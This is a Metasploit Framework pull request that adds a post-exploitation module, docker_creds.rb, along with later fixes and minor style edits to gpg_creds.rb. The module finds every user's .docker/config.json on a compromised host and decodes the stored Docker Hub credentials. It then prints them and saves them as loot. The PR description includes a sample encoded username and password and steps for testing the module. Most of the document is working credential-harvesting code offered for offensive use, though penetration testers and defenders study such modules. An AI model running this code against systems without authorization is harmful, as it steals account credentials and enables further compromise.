### PR TITLE
Post module for gather Docker credentials

### DIFF
--- a/modules/post/multi/gather/docker_creds.rb
+++ b/modules/post/multi/gather/docker_creds.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Post
     # Array#select! is only in 1.9
     paths = paths.select { |d| directory?(d) }
 
-    if paths.nil? or paths.empty?
+    if paths.nil? || paths.empty?
       print_error("No users found with a .docker directory")
       return
     end
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Post
       file = "config.json"
       target = "#{path}/#{file}"
 
-      if file?(target)
+      if file? target
         print_status("Downloading #{target} -> #{file}")
         extract(target)
       end

--- a/modules/post/multi/gather/docker_creds.rb
+++ b/modules/post/multi/gather/docker_creds.rb
@@ -1,0 +1,71 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'json'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info={})
+    super( update_info(info,
+      'Name'           => 'Multi Gather Docker Credentials Collection',
+      'Description'    => %q{
+          This module will collect the contents of all users' .docker directories on the targeted
+          machine. If the user has already push to docker hub, chances are that the password was
+          saved in base64 (default behavior).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => ['Flibustier'],
+      'Platform'       => %w{ bsd linux osx unix },
+      'SessionTypes'   => ['shell']
+    ))
+  end
+
+  # This module is largely based on gpg_creds.rb.
+
+  def run
+    print_status("Finding .docker directories")
+    paths = enum_user_directories.map {|d| d + "/.docker"}
+    # Array#select! is only in 1.9
+    paths = paths.select { |d| directory?(d) }
+
+    if paths.nil? or paths.empty?
+      print_error("No users found with a .docker directory")
+      return
+    end
+
+    download_loot(paths)
+  end
+
+  def download_loot(paths)
+    print_status("Looting #{paths.count} directories")
+    paths.each do |path|
+      path.chomp!
+      file = "config.json"
+      target = "#{path}/#{file}"
+
+      if file?(target)
+        print_status("Downloading #{target} -> #{file}")
+        extract(target)
+      end
+    end
+  end
+
+  def extract(target)
+    file = read_file(target)
+    parsed = JSON.parse(file)
+    creds = parsed["auths"]["https://index.docker.io/v1/"]["auth"]
+    if creds.length > 0
+      plain = Rex::Text.decode_base64(creds)
+      print_good("Found #{plain}")
+      loot_path = store_loot("docker.credentials", "text/plain", session, plain,
+        "config.json", "Docker credentials from #{target}")
+      print_good("Saved credentials to #{loot_path}")
+    else
+      print_status("No credentials found in config file")
+    end
+  end
+end

--- a/modules/post/multi/gather/docker_creds.rb
+++ b/modules/post/multi/gather/docker_creds.rb
@@ -57,13 +57,16 @@ class MetasploitModule < Msf::Post
   def extract(target)
     file = read_file(target)
     parsed = JSON.parse(file)
-    creds = parsed["auths"]["https://index.docker.io/v1/"]["auth"]
-    if creds.length > 0
-      plain = Rex::Text.decode_base64(creds)
-      print_good("Found #{plain}")
-      loot_path = store_loot("docker.credentials", "text/plain", session, plain,
-        "config.json", "Docker credentials from #{target}")
-      print_good("Saved credentials to #{loot_path}")
+    if parsed["auths"] && parsed["auths"]["https://index.docker.io/v1/"]
+      creds = parsed["auths"]["https://index.docker.io/v1/"]["auth"]
+
+      if creds.length > 0
+        plain = Rex::Text.decode_base64(creds)
+        print_good("Found #{plain}")
+        loot_path = store_loot("docker.credentials", "text/plain", session, plain,
+          "config.json", "Docker credentials from #{target}")
+        print_good("Saved credentials to #{loot_path}")
+      end
     else
       print_status("No credentials found in config file")
     end

--- a/modules/post/multi/gather/gpg_creds.rb
+++ b/modules/post/multi/gather/gpg_creds.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Post
     # Array#select! is only in 1.9
     paths = paths.select { |d| directory?(d) }
 
-    if paths.nil? or paths.empty?
+    if paths.nil? || paths.empty?
       print_error("No users found with a .gnupg directory")
       return
     end
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Post
         if directory?(target)
           next
         end
-        print_status("Downloading #{path}#{sep}#{file} -> #{file}")
+        print_status("Downloading #{target} -> #{file}")
         data = read_file(target)
         file = file.split(sep).last
         type = file.gsub(/\.gpg.*/, "").gsub(/gpg\./, "")


### PR DESCRIPTION
This module will collect the contents of all users' .docker directories on the targeted machine. If the user has already push to docker hub, chances are that the password was saved in base64 (default behavior).

For testing, I have the following `config.json` file on my `~/.docker`
```
{
	"auths": {
		"https://index.docker.io/v1/": {
			"auth": "ZmxpYnVzdGllcjpiYWd1ZXR0ZQ=="
		}
	}
}
```
 The above example is `flibustier:baguette`, corresponding to `username:password` 

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [ ] Use any exploit to create a session
- [x] `use post/multi/gather/docker_creds`
- [x] `set session SESSION`
- [x] `run`
- [x] **Verify** that you get the content of your `~/.docker/config.json`
